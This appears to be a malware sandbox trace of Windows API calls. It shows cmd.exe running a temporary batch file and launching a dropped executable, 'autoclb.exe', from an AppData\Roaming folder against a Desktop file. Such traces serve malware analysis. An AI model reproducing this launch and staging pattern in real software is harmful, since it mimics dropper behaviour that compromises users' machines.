(hFile=0x3c) returned 0x2 [0065.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.524] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f384 | out: lpMode=0x58f384) returned 1 [0065.525] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.525] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7c8368*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x58f39c, lpReserved=0x0 | out: lpBuffer=0x7c8368*, lpNumberOfCharsWritten=0x58f39c*=0x3) returned 1 [0065.525] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f3a4 | out: _Buffer=" /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\" ") returned 102 [0065.525] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.525] GetFileType (hFile=0x3c) returned 0x2 [0065.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.525] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f37c | out: lpMode=0x58f37c) returned 1 [0065.533] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.533] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x66, lpNumberOfCharsWritten=0x58f394, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f394*=0x66) returned 1 [0065.534] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f3b8 | out: _Buffer="\r\n") returned 2 [0065.534] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.534] GetFileType (hFile=0x3c) returned 0x2 [0065.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.534] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f390 | out: lpMode=0x58f390) returned 1 [0065.534] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.534] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f3a8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f3a8*=0x2) returned 1 [0065.534] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0065.534] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0065.534] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0065.535] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0065.535] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0065.535] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0065.535] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0065.535] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0065.535] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0065.535] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0065.535] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0065.535] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0065.535] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0065.535] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0065.535] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0065.535] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0065.535] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0065.535] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0065.535] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0065.535] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0065.535] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0065.535] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0065.535] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0065.535] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0065.535] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0065.535] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0065.535] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0065.535] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0065.535] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0065.535] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0065.535] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0065.535] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0065.535] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0065.535] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0065.535] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0065.535] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0065.535] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0065.535] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0065.536] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0065.536] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0065.536] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0065.536] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0065.536] _wcsnicmp (_String1="cmd", _String2="cmd ", _MaxCount=0x4) returned -32 [0065.536] SetErrorMode (uMode=0x0) returned 0x0 [0065.536] SetErrorMode (uMode=0x1) returned 0x0 [0065.536] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7c8980, lpFilePart=0x58f154 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x58f154*="Desktop") returned 0x1d [0065.536] SetErrorMode (uMode=0x0) returned 0x1 [0065.536] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0065.536] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0065.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.537] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cmd.*", fInfoLevelId=0x1, lpFindFileData=0x58eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eee0) returned 0xffffffff [0065.537] GetLastError () returned 0x2 [0065.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.537] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cmd.*", fInfoLevelId=0x1, lpFindFileData=0x58eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eee0) returned 0xffffffff [0065.540] GetLastError () returned 0x2 [0065.540] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.*", fInfoLevelId=0x1, lpFindFileData=0x58eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eee0) returned 0x7c8d18 [0065.540] FindClose (in: hFindFile=0x7c8d18 | out: hFindFile=0x7c8d18) returned 1 [0065.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.COM", fInfoLevelId=0x1, lpFindFileData=0x58eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eee0) returned 0xffffffff [0065.541] GetLastError () returned 0x2 [0065.541] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.EXE", fInfoLevelId=0x1, lpFindFileData=0x58eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eee0) returned 0x7c8d18 [0065.541] FindClose (in: hFindFile=0x7c8d18 | out: hFindFile=0x7c8d18) returned 1 [0065.541] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0065.541] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0065.541] GetConsoleTitleW (in: lpConsoleTitle=0x58ef28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.542] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0065.542] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0065.542] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0065.542] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0065.542] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0065.542] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0065.542] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0065.542] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0065.542] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0065.542] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0065.542] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0065.542] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0065.542] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0065.542] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0065.542] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0065.542] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0065.542] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0065.542] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0065.542] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0065.542] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0065.542] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0065.542] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0065.542] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0065.542] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0065.542] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0065.542] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0065.542] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0065.542] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0065.543] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0065.543] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0065.543] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0065.543] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0065.543] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0065.543] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0065.543] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0065.543] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0065.543] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0065.543] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0065.543] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0065.543] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0065.543] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0065.543] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0065.543] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0065.543] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0065.543] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0065.543] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0065.543] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0065.543] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0065.543] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0065.543] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0065.543] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0065.543] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0065.543] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0065.543] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0065.543] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0065.543] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0065.543] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0065.543] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0065.543] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0065.543] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0065.543] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0065.543] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0065.544] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0065.544] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0065.544] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0065.544] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0065.544] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0065.544] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0065.544] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0065.544] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0065.544] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0065.544] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0065.544] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0065.544] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0065.544] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0065.544] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0065.544] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0065.544] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0065.544] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0065.544] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0065.544] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0065.544] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0065.544] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0065.544] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0065.544] _wcsicmp (_String1="cmd", _String2="FOR") returned -3 [0065.544] _wcsicmp (_String1="cmd", _String2="IF") returned -6 [0065.544] _wcsicmp (_String1="cmd", _String2="REM") returned -15 [0065.544] _wcsnicmp (_String1="cmd", _String2="cmd ", _MaxCount=0x4) returned -32 [0065.544] SetErrorMode (uMode=0x0) returned 0x0 [0065.545] SetErrorMode (uMode=0x1) returned 0x0 [0065.545] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7c9020, lpFilePart=0x58ea34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x58ea34*="Desktop") returned 0x1d [0065.545] SetErrorMode (uMode=0x0) returned 0x1 [0065.545] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0065.545] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0065.545] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.545] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.545] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cmd.*", fInfoLevelId=0x1, lpFindFileData=0x58e7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58e7c0) returned 0xffffffff [0065.546] GetLastError () returned 0x2 [0065.546] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.546] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cmd.*", fInfoLevelId=0x1, lpFindFileData=0x58e7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58e7c0) returned 0xffffffff [0065.546] GetLastError () returned 0x2 [0065.546] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.546] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.*", fInfoLevelId=0x1, lpFindFileData=0x58e7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58e7c0) returned 0x7c93b8 [0065.546] FindClose (in: hFindFile=0x7c93b8 | out: hFindFile=0x7c93b8) returned 1 [0065.546] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.COM", fInfoLevelId=0x1, lpFindFileData=0x58e7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58e7c0) returned 0xffffffff [0065.547] GetLastError () returned 0x2 [0065.547] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.EXE", fInfoLevelId=0x1, lpFindFileData=0x58e7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58e7c0) returned 0x7c93b8 [0065.547] FindClose (in: hFindFile=0x7c93b8 | out: hFindFile=0x7c93b8) returned 1 [0065.547] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0065.547] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0065.547] GetConsoleTitleW (in: lpConsoleTitle=0x58ecb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.547] InitializeProcThreadAttributeList (in: lpAttributeList=0x58ebe0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x58ebc4 | out: lpAttributeList=0x58ebe0, lpSize=0x58ebc4) returned 1 [0065.547] UpdateProcThreadAttribute (in: lpAttributeList=0x58ebe0, dwFlags=0x0, Attribute=0x60001, lpValue=0x58ebcc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x58ebe0, lpPreviousValue=0x0) returned 1 [0065.547] GetStartupInfoW (in: lpStartupInfo=0x58ec18 | out: lpStartupInfo=0x58ec18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0065.548] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0065.549] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0065.549] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0065.551] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x58eb68*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x58ebb4 | out: lpCommandLine="cmd /C \"\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"", lpProcessInformation=0x58ebb4*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xf9c, dwThreadId=0xfa0)) returned 1 [0065.567] CloseHandle (hObject=0xb0) returned 1 [0065.567] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0065.567] GetEnvironmentStringsW () returned 0x7b9e80* [0065.567] FreeEnvironmentStringsA (penv="=") returned 1 [0065.567] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0070.581] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x58eb4c | out: lpExitCode=0x58eb4c*=0x0) returned 1 [0070.581] CloseHandle (hObject=0xb8) returned 1 [0070.581] _vsnwprintf (in: _Buffer=0x58ec34, _BufferCount=0x13, _Format="%08X", _ArgList=0x58eb54 | out: _Buffer="00000000") returned 8 [0070.581] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0070.581] GetEnvironmentStringsW () returned 0x7bb390* [0070.581] FreeEnvironmentStringsA (penv="=") returned 1 [0070.581] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0070.581] GetEnvironmentStringsW () returned 0x7bb390* [0070.582] FreeEnvironmentStringsA (penv="=") returned 1 [0070.582] DeleteProcThreadAttributeList (in: lpAttributeList=0x58ebe0 | out: lpAttributeList=0x58ebe0) [0070.582] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.582] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0070.582] _get_osfhandle (_FileHandle=1) returned 0x3c [0070.582] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0070.582] _get_osfhandle (_FileHandle=0) returned 0x38 [0070.582] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0070.583] SetConsoleInputExeNameW () returned 0x1 [0070.583] GetConsoleOutputCP () returned 0x1b5 [0070.583] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0070.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.583] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0070.583] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0070.583] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.583] SetFilePointer (in: hFile=0xb8, lDistanceToMove=60, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3c [0070.584] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.584] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3c [0070.584] ReadFile (in: hFile=0xb8, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f344, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f344*=0x32, lpOverlapped=0x0) returned 1 [0070.584] SetFilePointer (in: hFile=0xb8, lDistanceToMove=91, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b [0070.584] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xa1a960, cbMultiByte=31, lpWideCharStr=0xa057e0, cchWideChar=8191 | out: lpWideCharStr="if errorlevel 1 goto 18135671\r\n\r\n") returned 31 [0070.584] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.584] GetFileType (hFile=0xb8) returned 0x1 [0070.584] _get_osfhandle (_FileHandle=3) returned 0xb8 [0070.584] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b [0070.585] _wcsicmp (_String1="if", _String2=")") returned 64 [0070.585] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0070.585] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0070.585] _wcsicmp (_String1="IF", _String2="if") returned 0 [0070.585] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0070.585] _wcsicmp (_String1="errorlevel", _String2="/I") returned 54 [0070.585] _wcsicmp (_String1="ERRORLEVEL", _String2="errorlevel") returned 0 [0070.586] _wcsicmp (_String1="goto", _String2=")") returned 62 [0070.586] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0070.586] _wcsicmp (_String1="FOR/?", 